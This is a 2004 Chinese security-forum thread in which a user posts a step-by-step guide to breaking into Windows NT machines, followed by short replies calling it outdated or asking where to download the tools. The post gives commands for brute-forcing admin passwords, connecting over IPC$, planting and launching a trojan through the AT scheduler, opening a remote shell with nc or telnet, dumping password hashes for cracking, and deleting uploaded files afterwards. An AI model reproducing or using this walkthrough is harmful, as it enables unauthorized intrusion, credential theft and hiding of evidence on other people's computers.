论坛: 菜鸟乐园 标题: 你看得懂的入侵方法! 复制本贴地址    
作者: newmyth21 [newmyth21]    论坛用户   登录
1 本方法要有以下几个工具:PINGER;LETMEIN;NTSRV;NETSVC;PWDDUMP;NC;L0PHTCRACK

2 开始,用PINGER查一个IP段,找到目标,并选定

3 进入DOS,利用LETMEIN

C:\>LETMEIN \\IP -ADMIN -D MYPWD

探测该网站的USER和PASSWD,如没有,试其它网站,你总会找到几个笨蛋的,我们这里以USER=KAWE PASSWD=KAWEN为准

4 进入IPC连接

C:\>NET USE \\IP\IPC$ :KAWEN" /USER:"KAWEN"

5 进去后,COPY工具进去 NTSRV;NETSVC;PWDDUMP

方法:COPY C:\HACK2\NTSRV.EXE \\IP\ADMIN$\SYSTEM32

6 启动木马程序(NESRV.EXE)并监听64321端口.

C:\>NETSVC \\IP SCHEDULE /START (启动SCHEDULE)

C:\>AT \\IP 13:00 NTSRV.EXE /PORT:64321 |NOMSG

(SCHEDULE启动NTSRV.EXE并监听64321)

7.成功.启动木马客户端(NETBUS)在HOSTNAME/IP中填入IP,在PORT中填入64321,选CONNECT.

8选项GETINFO 会反回一个消息,可以看到NT在对方的C盘中的WINNT

9 选APPREDIRECT,我们要利用它的CMD.EXE,弹出的窗口填入

C:\>C:\WINNT\SYSTEM32\CMD.EXE

PORT:64321

10 我们可以利用TELNET和NC二种方式来控制

TELNET IP 64321

NC IP 64321

并用NET VIEW看共享

11 在TELNET或 NC方式中运行PWDDUMP.EXE,利用NETBUS将SERVER.LC拉下来,并用L0PHTCRACK来解密

C:\>WINNT>SYSTEM32>PWDDUMMP >SERVER.LC 用L0PHTCRACK解密码

12 得到PASSWD做什么随便你,别忘了X掉你上传到他机子上的FILE


地主 发表时间: 04-01-11 16:24

回复: cg2327 [cg2327]      登录
过时了

B1层 发表时间: 04-01-11 18:23

回复: christie [christie]   论坛用户   登录
LETMAIN这是什么命令,好象没有这个指令的?

B2层 发表时间: 04-01-11 18:50

回复: bj12g [bj12g]   论坛用户   登录

letmein是穷举法破解的经典软件了~~~~~~~~`

B3层 发表时间: 04-01-15 00:17

回复: qq2003gw [qq2003gw]   论坛用户   登录
是入侵Linux吧?!

B4层 发表时间: 04-01-15 16:41

回复: ka [ka]   论坛用户   登录


B5层 发表时间: 04-01-15 18:32

回复: yyzqqj [yyzqqj]   论坛用户   登录
我觉的大写的命令我有点看不熟悉啊,可以你这种入侵方法太麻烦了~

B6层 发表时间: 04-01-16 13:27

回复: zintaly [zintaly]   论坛用户   登录
那些工具中文名字谁能解释一下,最好说明哪里有下。。。

B7层 发表时间: 04-01-17 20:39

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号